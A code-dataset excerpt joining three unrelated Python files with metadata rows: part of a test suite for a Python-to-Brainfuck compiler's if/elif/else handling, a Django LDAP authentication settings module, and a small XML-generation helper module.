python = ("if False:\n print 'IF'\n"
"else:\n print 'ELSE'\n")
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "ELSE\n")
def test_if_elif_else_match_if(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = ("if 'A':\n print 'IF'\n"
"elif 'B':\n print 'ELIF'\n"
"else:\n print 'ELSE'\n")
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "IF\n")
def test_if_elif_else_match_elif(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = ("if False:\n print 'IF'\n"
"elif 'B':\n print 'ELIF'\n"
"else:\n print 'ELSE'\n")
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "ELIF\n")
def test_if_elif_else_match_else(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = ("if False:\n print 'IF'\n"
"elif False:\n print 'ELIF 2'\n"
"else:\n print 'ELSE'")
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "ELSE\n")
|
apache-2.0
| -2,884,884,697,422,707,000
| 40.96875
| 58
| 0.590966
| false
| 3.518777
| true
| false
| false
|
kingsdigitallab/kdl-django
|
ddhldap/settings.py
|
1
|
1609
|
# -----------------------------------------------------------------------------
# http://pythonhosted.org/django-auth-ldap/
# -----------------------------------------------------------------------------
from django_auth_ldap.config import LDAPSearch, PosixGroupType
import ldap
LDAP_BASE_DC = 'dc=dighum,dc=kcl,dc=ac,dc=uk'
LDAP_BASE_OU = 'ou=groups,' + LDAP_BASE_DC
# Baseline configuration
AUTH_LDAP_SERVER_URI = 'ldap://ldap1.cch.kcl.ac.uk'
AUTH_LDAP_BIND_DN = ''
AUTH_LDAP_BIND_PASSWORD = ''
AUTH_LDAP_USER_DN_TEMPLATE = 'uid=%(user)s,ou=people,' + LDAP_BASE_DC
# Set up the basic group parameters
AUTH_LDAP_GROUP_SEARCH = LDAPSearch(
LDAP_BASE_OU,
ldap.SCOPE_SUBTREE,
'(objectClass=posixGroup)'
)
AUTH_LDAP_GROUP_TYPE = PosixGroupType(name_attr='cn')
# Simple group restrictions
# TODO: Set this value in the project settings
AUTH_LDAP_REQUIRE_GROUP = ''
# Populate the Django user from the LDAP directory
AUTH_LDAP_USER_ATTR_MAP = {
'first_name': 'givenName',
'last_name': 'sn',
'email': 'mail'
}
AUTH_LDAP_USER_FLAGS_BY_GROUP = {
'is_active': 'cn=confluence-users,' + LDAP_BASE_OU,
'is_staff': 'cn=kdl-staff,' + LDAP_BASE_OU,
'is_superuser': 'cn=sysadmin,' + LDAP_BASE_OU
}
AUTH_LDAP_PROFILE_FLAGS_BY_GROUP = {}
# This is the default, but I like to be explicit
AUTH_LDAP_ALWAYS_UPDATE_USER = True
# Cache group memberships for an hour to minimize LDAP traffic
AUTH_LDAP_CACHE_GROUPS = True
AUTH_LDAP_GROUP_CACHE_TIMEOUT = 60 * 60
AUTHENTICATION_BACKENDS = (
'django_auth_ldap.backend.LDAPBackend',
'django.contrib.auth.backends.ModelBackend',
)
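# Consumption sketch (illustrative, not part of the original file): a project's
# main settings module typically star-imports this one so the AUTH_LDAP_*
# constants and AUTHENTICATION_BACKENDS land in Django's settings namespace,
# e.g. in a hypothetical kdl_django/settings.py:
#
#     from ddhldap.settings import *  # noqa: F403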
|
mit
| 6,093,891,807,804,528,000
| 28.254545
| 79
| 0.632691
| false
| 3.19246
| false
| false
| false
|
jperla/webify
|
webify/templates/helpers/xml.py
|
1
|
1061
|
__no_content = object()
def node(element_name, content=__no_content, attributes={}):
    # Identity test against the module-level sentinel distinguishes "no
    # content supplied" from falsy content such as the empty string.
    if content is __no_content:
        return node_block(element_name, attributes)
    else:
        return node_inline(element_name, content, attributes)
def _attrs_string(attributes):
attrs = u' '.join(['%s="%s"' % (k,v) for k,v in attributes.iteritems()])
attrs_string = (u' ' + attrs) if len(attrs) > 0 else u''
return attrs_string
def node_inline(element_name, content, attributes={}):
attrs_string = _attrs_string(attributes)
if content == u'':
return u'<%s%s />' % (element_name, attrs_string)
else:
return u'<%s%s>%s</%s>\n' % (element_name, attrs_string, content, element_name)
def node_block(element_name, attributes={}):
attrs_string = _attrs_string(attributes)
return u'<%s%s>\n' % (element_name, attrs_string), u'</%s>\n' % element_name
def cdata(content):
    return u'<![CDATA[%s\n]]>' % content
def cdata_block():
    return u'<![CDATA[', u'\n]]>'
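# A short usage sketch (added for illustration, not in the original module);
# the expected output follows from the helpers as written above.
if __name__ == '__main__':
    # Inline node: one string, newline-terminated when content is non-empty.
    print node_inline(u'a', u'home', {u'href': u'/'})   # <a href="/">home</a>
    # Block node: an (open, close) pair for wrapping nested markup.
    begin, end = node_block(u'ul', {u'class': u'nav'})
    print begin + node_inline(u'li', u'item') + end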
|
mit
| -1,484,670,680,213,760,300
| 33.225806
| 87
| 0.613572
| false
| 3.234756
| false
| false
| false
|